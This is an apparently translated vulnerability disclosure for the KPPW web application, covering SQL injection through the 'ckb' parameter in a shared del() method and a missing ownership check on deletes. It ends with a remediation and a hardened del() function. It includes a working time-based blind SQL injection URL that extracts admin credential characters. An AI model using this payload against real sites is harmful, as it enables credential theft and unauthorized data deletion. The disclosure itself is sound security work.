KPPW latest version SQL injection vulnerability 4 (multiple injections and an unauthorized-operation issue, all due to the same problem)

Source: Internet
Author: User



File: /control/user/account_report.php

    $objReportT = keke_table_class::get_instance('witkey_report');
    if (isset($action)) {
        switch ($action) {
            case 'mulitdel':
                if ($ckb) {
                    // $ckb comes straight from the request (the ckb parameter);
                    // note that $objTaskT is never initialized in this file
                    $objTaskT->del('task_id', $ckb);
                    kekezu::show_msg('deleted successfully', $strUrl, NULL, NULL, 'ok');
                } else {
                    kekezu::show_msg('deletion failed', NULL, 'error');
                }
                break;
        }
    }



In $objTaskT->del('task_id', $ckb); the request parameter $ckb is passed straight into the del function.

Following the del function into /lib/inc/keke_table_class.php:

    function del($pk, $val, $url = null) {
        if (!$val) {
            return false;
        }
        if (is_array($val) && !empty($val)) {
            // array of ids: joined and interpolated into the WHERE clause as-is
            $ids = implode(',', $val);
            $this->_table_obj->setWhere("$pk in ($ids)");
        } elseif ($val) {
            // scalar: concatenated into the WHERE clause without quotes or a cast
            $this->_table_obj->setWhere("$pk = " . $val);
        }
        $del_query = "del_" . $this->_pre . $this->_table_name;
        return $this->_table_obj->$del_query();
    }



We can see that $val here is simply the $ckb variable from the request.

When $val is non-empty, it goes straight into the WHERE condition: neither branch quotes or casts it, so the result is SQL injection.

There is a bug in the caller, though: del is a method of keke_table_class in /lib/inc/keke_table_class.php, but account_report.php instantiates the class as $objReportT = keke_table_class::get_instance('witkey_report') and then calls del on $objTaskT, which is never initialized, so the del function cannot actually be reached from this file.



The same issue exists in /control/user/account_rights.php.



Because del is a shared method of keke_table_class in /lib/inc/keke_table_class.php, it is called from many places:



The admin-backend triggers do not work here (backend vulnerabilities, it seems, are something nobody cares about...).

On the front end there are more than 20 files that trigger it.

Some of them are filtered.

Several others are not, including:

/control/user/message_detail.php
/control/user/message_notice.php
/control/user/message_private.php
/control/user/shop_caselist.php
/control/user/transaction_released.php
/control/user/transaction_service.php





Take /control/user/transaction_service.php as an example:

    $strModelName = $kekezu->_model_list[$intModelId]['model_code'];
    $arrStatus = call_user_func(array($strModelName . '_shop_class', 'get_' . $strModelName . '_status'));
    $objServiceT = keke_table_class::get_instance('witkey_service');
    if (isset($action)) {
        switch ($action) {
            case 'mulitdel':
                if ($ckb) {
                    // here the object is initialized, so del() is reachable with the raw $ckb
                    $objServiceT->del('service_id', $ckb);
                    kekezu::show_msg('deleted successfully', $strUrl, NULL, NULL, 'ok');
                } else {
                    kekezu::show_msg('deletion failed', NULL, 'error');
                }
                break;
        }
    }



The same injection applies here.



Second, when deleting data of any type, the row is deleted by id alone and the owning user is never checked, which results in unauthorized operations.

Any user can delete content belonging to other users.

In this case, all modules and data created by the administrator can be deleted.

SQL injection:

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=service&action=mulitDel&ckb=1161 and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)



Check the SQL execution result:



The response comes back after a 5-second delay.



The first character of username + password is thus determined.

The ckb here is the service_id of the service module.

ckb=1161 is a module created by the admin user, and it can be deleted too, which is an unauthorized operation.

Solution:

Cast the value with intval(), or wrap it in single quotes, before it reaches the query; and check that the row belongs to the current user before deleting it.
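A hardened del() written as an added example for this write-up, not KPPW's own code: it addresses both problems above, the raw concatenation into the WHERE clause and the missing ownership check. It assumes the same $this->_table_obj->setWhere() / del_* plumbing as the original method, an owner column whose name the caller passes in (here 'uid', a placeholder), and that the caller has the current user's id available.

```php
<?php
// Added example (not KPPW's code): drop-in replacement for keke_table_class::del().
// Assumptions: $this->_table_obj, $this->_pre and $this->_table_name behave as in
// the original; $owner_col is a trusted column name chosen by the caller (e.g. 'uid').
function del($pk, $val, $url = null, $owner_col = null, $owner_id = null) {
    if (!$val) {
        return false;
    }
    // Normalise to an array and cast every id to int. A payload such as
    // "1161 and 1=if(...)" collapses to 1161, so nothing attacker-controlled
    // is ever interpolated into SQL. Drop anything that is not a positive id.
    $ids = array_filter(array_map('intval', (array) $val), function ($id) {
        return $id > 0;
    });
    if (empty($ids)) {
        return false;
    }
    // $pk is a column name supplied by the code, never by the request.
    $where = "$pk in (" . implode(',', $ids) . ")";
    // Ownership check: restrict the delete to rows owned by the current user,
    // so a valid id belonging to the admin (e.g. service_id 1161) is not deleted.
    if ($owner_col !== null) {
        $where .= " and $owner_col = " . intval($owner_id);
    }
    $this->_table_obj->setWhere($where);
    $del_query = "del_" . $this->_pre . $this->_table_name;
    return $this->_table_obj->$del_query();
}

// Caller side (transaction_service.php), with a hypothetical session variable
// standing in for however KPPW stores the logged-in user's id:
// $objServiceT->del('service_id', $ckb, null, 'uid', $current_user_id);
```

Admin-backend callers that legitimately delete any user's rows can keep passing $owner_col as null; front-end callers should always pass it.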
